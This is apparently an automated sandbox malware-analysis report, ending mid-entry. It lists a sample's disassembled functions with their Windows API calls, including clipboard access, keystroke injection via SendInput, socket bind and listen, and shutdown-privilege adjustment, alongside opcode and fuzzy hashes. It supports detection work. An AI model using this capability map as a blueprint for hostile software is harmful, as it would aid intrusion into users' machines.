                                                                                                                                                                              • Instruction ID: a9480b40b2ff53407d09b405030a9c62f375ea2da9ca7b4f316bdd9d96c2a353
                                                                                                                                                                              • Opcode Fuzzy Hash: ee945507a9565c7d54c2551b144d28dfaacd6a4c9dbe8c897b64a7df8d78fae4
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F21C5B2408348AAC310EBA4D8559EBBBEC9F59214F044E5FF5D4C3252EA38D64DC776
                                                                                                                                                                              Function 004B5D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                                                              • API String ID: 0-2893523900
                                                                                                                                                                              • Opcode ID: 8e84dbbd1d0b22ee716732181b09ae14577c874c64712c1204f903254f96b906
                                                                                                                                                                              • Instruction ID: 32adf74dce9c4d6c377b61d7eccbf0dcdb84ed04bbeab6bb3dd822ef06177ae3
                                                                                                                                                                              • Opcode Fuzzy Hash: 8e84dbbd1d0b22ee716732181b09ae14577c874c64712c1204f903254f96b906
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A6281B1E002199BDF14DF99C8817EEBBB5BF48310F15816BE845EB281D7789E41CBA4
                                                                                                                                                                              Function 00507294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1737998785-0
                                                                                                                                                                              • Opcode ID: cdd8b7c1851123017cab4258a15931c774dbfcfda9b65c4387ecb74eeed19eab
                                                                                                                                                                              • Instruction ID: 2c36732fa29d0fa9b5e308d2037fa2be436ce9630509fbf382438264bdcaeac8
                                                                                                                                                                              • Opcode Fuzzy Hash: cdd8b7c1851123017cab4258a15931c774dbfcfda9b65c4387ecb74eeed19eab
                                                                                                                                                                              • Instruction Fuzzy Hash: DF21F635600115AFD7106F25EC1AB6E7BB8FF14710F00801AF9098B3A1DB78ED04EBA8
                                                                                                                                                                              Function 005024A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 005024F6
                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00502526
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0050253A
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502555
                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 005025F3
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00502609
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 713712311-438819550
                                                                                                                                                                              • Opcode ID: 87c3af8014eb76313b1394fe1b58b0d3c00c2e3155e563e1455d27ddcb20e22c
                                                                                                                                                                              • Instruction ID: 3176e5940e2baa78d0bb91693c141bd539502a672bb83c93fba39b0591d97afb
                                                                                                                                                                              • Opcode Fuzzy Hash: 87c3af8014eb76313b1394fe1b58b0d3c00c2e3155e563e1455d27ddcb20e22c
                                                                                                                                                                              • Instruction Fuzzy Hash: 31418D7190021AAFCF14DFA5CC99AEEBFB4FF15304F10045AE815A62D0EB359A84DFA4
                                                                                                                                                                              Function 004B8CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                                                              • API String ID: 0-1546025612
                                                                                                                                                                              • Opcode ID: 19d2161441f279a07efe63801ad8068cd0ac511e881fc23c809ed5224750a3ae
                                                                                                                                                                              • Instruction ID: 868063e6f45a507c8fa548dfebc5855dda844606c3c661c388e026c4caff59f1
                                                                                                                                                                              • Opcode Fuzzy Hash: 19d2161441f279a07efe63801ad8068cd0ac511e881fc23c809ed5224750a3ae
                                                                                                                                                                              • Instruction Fuzzy Hash: C7927D71E0021ACBDF24DF58C8407EEBBB1BB54314F1485AAD916AB380D7789D81DF65
                                                                                                                                                                              Function 004B8530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                              • Opcode ID: 540a7c588a5efa14dff45927a18409696dc2ae5240849e8265b32d49df27f779
                                                                                                                                                                              • Instruction ID: b6c14757cf1e5cc0df801acc53e2ed6058c64c4425d292f4e00c963bdd702697
                                                                                                                                                                              • Opcode Fuzzy Hash: 540a7c588a5efa14dff45927a18409696dc2ae5240849e8265b32d49df27f779
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A129E70A00619EBDF04DFA5D981AEEB7F9FF48304F20456EE406E7290EB399911CB65
                                                                                                                                                                              Function 004F82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004EBF0F
                                                                                                                                                                                • Part of subcall function 004EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004EBF3C
                                                                                                                                                                                • Part of subcall function 004EBEC3: GetLastError.KERNEL32 ref: 004EBF49
                                                                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 004F830C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                              • API String ID: 2234035333-194228
                                                                                                                                                                              • Opcode ID: 053c9abc53651b30c741f4465336062fa736c0603f48d0741548bda98af05d35
                                                                                                                                                                              • Instruction ID: 85444b7e366aa48d161b2e21392ca873de1298c1ba092ac57bf2a68a371d615f
                                                                                                                                                                              • Opcode Fuzzy Hash: 053c9abc53651b30c741f4465336062fa736c0603f48d0741548bda98af05d35
                                                                                                                                                                              • Instruction Fuzzy Hash: F101FC71B40319ABE76816788C4BBBB3668DB00F84F14042EFF03DA2E1DE595C0181AC
                                                                                                                                                                              Function 005091DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00509235
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509244
                                                                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00509260
                                                                                                                                                                              • listen.WSOCK32(00000000,00000005), ref: 0050926F
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509289
                                                                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 0050929D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279440585-0
                                                                                                                                                                              • Opcode ID: d789954cf5c7c98963e2b4e1648ed569b62520d04ce4e322f3da8af460706e23
                                                                                                                                                                              • Instruction ID: 86b93d47a7baf546090b223f8279b67eeb3b1a07e1cd57a0f76b80743cfd630a
                                                                                                                                                                              • Opcode Fuzzy Hash: d789954cf5c7c98963e2b4e1648ed569b62520d04ce4e322f3da8af460706e23
                                                                                                                                                                              • Instruction Fuzzy Hash: AF218D39600201AFCB00EF64D885B6EBBB9FF44724F108119F956AB3D2CB74AD45DB61
                                                                                                                                                                              Function 004B6670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID: hNV$tMV
                                                                                                                                                                              • API String ID: 4104443479-474198503
                                                                                                                                                                              • Opcode ID: 33e4aadd45b22ceaeac9aafc7ee5a332bf919d28a2f9fad87864400b3ef80ba4
                                                                                                                                                                              • Instruction ID: 754537382ba19b40e01ec1e93d765c2634e2aff81c285b378ee288cd72a75451
                                                                                                                                                                              • Opcode Fuzzy Hash: 33e4aadd45b22ceaeac9aafc7ee5a332bf919d28a2f9fad87864400b3ef80ba4
                                                                                                                                                                              • Instruction Fuzzy Hash: 2CA22875D01219CFCB24CF58C8806EDBBB1FF49314F2581AAE859AB390D7789D82DB64
                                                                                                                                                                              Function 004BA0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                                • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                              • _memmove.LIBCMT ref: 00523020
                                                                                                                                                                              • _memmove.LIBCMT ref: 00523135
                                                                                                                                                                              • _memmove.LIBCMT ref: 005231DC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1300846289-0
                                                                                                                                                                              • Opcode ID: 0821c98212667eceb4b960843829acc850348361f3591bc1158d7f7af8e24348
                                                                                                                                                                              • Instruction ID: 1d543e0fc2cdbb8fb21e76e73df1e9d47b47aebfc330fc21ed50ced0a21e009e
                                                                                                                                                                              • Opcode Fuzzy Hash: 0821c98212667eceb4b960843829acc850348361f3591bc1158d7f7af8e24348
                                                                                                                                                                              • Instruction Fuzzy Hash: 6F02A370A00115DBCF04DF69D981AAEBBB5FF45300F14806EE806DB395EB39DA15CBA5
                                                                                                                                                                              Function 005096E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 0050ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0050ACF5
                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0050973D
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00509760
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4170576061-0
                                                                                                                                                                              • Opcode ID: 30b53c39031a4f1440cd08bec2268dc02f1f638b06620ff96208cc17ecbe6ee4
                                                                                                                                                                              • Instruction ID: 5c1f638eef09198cfba0a76c099d2a5ad2956d5dd2e6d7b7b3808682a87eabfe
                                                                                                                                                                              • Opcode Fuzzy Hash: 30b53c39031a4f1440cd08bec2268dc02f1f638b06620ff96208cc17ecbe6ee4
                                                                                                                                                                              • Instruction Fuzzy Hash: C641E474600200AFDB14AF25CC82F6E77EDEF44728F14845EF955AB392DA789D018BA5
                                                                                                                                                                              Function 004FF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004FF37A
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FF3AA
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FF3BF
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004FF3D0
                                                                                                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 004FF3FE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2387731787-0
                                                                                                                                                                              • Opcode ID: 0151f69f5b20b62f1c292020d0966676b1cb2487b320893a1a5c1abaac2853e6
                                                                                                                                                                              • Instruction ID: 73736d6ee00e0892736191b05a4b6c5b610c15b3b2f85be58e4cd8c02cc0d663
                                                                                                                                                                              • Opcode Fuzzy Hash: 0151f69f5b20b62f1c292020d0966676b1cb2487b320893a1a5c1abaac2853e6
                                                                                                                                                                              • Instruction Fuzzy Hash: 4D41C0356043029FC704DF29C490EAAB3E4FF49328F10416EEA59CB3A1DB79A945CB99
                                                                                                                                                                              Function 005120F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,005120EC,?,005122E0), ref: 00512104
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00512116
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: GetProcessId$kernel32.dll
                                                                                                                                                                              • API String ID: 2574300362-399901964
                                                                                                                                                                              • Opcode ID: bb915afa7f9c779fdbd309b7a1b19fe424adc786b6a3fa608db24983c0bb6b93
                                                                                                                                                                              • Instruction ID: 0a336335eadef11a33c2a2e8f5115a329c750c75418b7e9a77d014a9526752a9
                                                                                                                                                                              • Opcode Fuzzy Hash: bb915afa7f9c779fdbd309b7a1b19fe424adc786b6a3fa608db24983c0bb6b93
                                                                                                                                                                              • Instruction Fuzzy Hash: 98D0A7345407129FEB209F71F80D6423EF8BB24300F004429E64AD2254D770C8C0CA60
                                                                                                                                                                              Function 004F4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004F439C
                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 004F43B8
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004F4425
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 004F4483
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                              • Opcode ID: b4cd720b2cda2a19e6ced3d239d412dfc45693a964dc6a1869c0b5c883111a13
                                                                                                                                                                              • Instruction ID: 8cc536ff4ae194f009c094bc73438e6dab20f72657fdc2bc5d81beeaa714c231
                                                                                                                                                                              • Opcode Fuzzy Hash: b4cd720b2cda2a19e6ced3d239d412dfc45693a964dc6a1869c0b5c883111a13
                                                                                                                                                                              • Instruction Fuzzy Hash: 6241F5B0A0025CAAEF209B65D8057FF7BB5AB95315F04015BF681A23C1CB7C8A859779
                                                                                                                                                                              Function 004F220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004F221E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                              • String ID: ($|
                                                                                                                                                                              • API String ID: 1659193697-1631851259
                                                                                                                                                                              • Opcode ID: 3f4f3318245aa13e9d0030713122d56d321a2d2c9a27bef0414175310eb32f96
                                                                                                                                                                              • Instruction ID: dd69782e583814b6020d686bf9f3b02deb6b5bf2843785173c9e0afbfe840d83
